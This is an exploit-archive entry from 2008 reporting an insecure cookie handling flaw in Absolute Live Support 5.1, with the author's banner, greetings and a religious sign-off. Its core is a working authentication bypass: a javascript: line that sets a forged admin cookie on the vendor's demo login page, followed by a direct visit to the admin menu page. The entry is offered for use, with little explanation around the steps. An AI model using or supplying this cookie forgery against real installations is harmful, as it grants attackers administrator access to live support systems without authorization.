[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Absolute Live Support 5.1 Insecure Cookie Handling Vulnerability
# Published : 2008-10-31
# Author : Hakxer
# Previous Title : Absolute Form Processor 4.0 Insecure Cookie Handling Vulnerability
# Next Title : SFS EZ Gaming Directory (directory.php id) SQL Injection Vulnerability


###############################################################################################
 _____    ____   __  ___    ______   ______       |   ____   _____     _____
|        / ___|    / /   / ____|  /      |      |  |      |  _     |
|_____  | |  _     V /    | |      |      |   ___|  |_____ | |_)  |  |_____
|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
|_____   ____|    |_|      _____|  _____/  |___|  |____  |__| _  ______|

[~] Discovered By: Hakxer
[~] Home : Www.educ-up.com
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Live Support  [see script] http://www.xigla.com/absolutelsnet/demo.htm
[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
[~] Team : EgY Coders 
#################################################################################################

Exploit : First go to http://www.xigla.com/absolutelsnet/demo/login.aspx
Second Execute JS Code 
[~] javascript:document.cookie="xlaALSDEMOadmin=userid=1&lvl=1&nick=admin&mywelcome=Hi, How may I help you";
Now Go to http://www.xigla.com/absolutelsnet/demo/menu.aspx

--- Proud To Be A Muslim ---

# _=END=_ # 

# www.Syue.com [2008-10-31]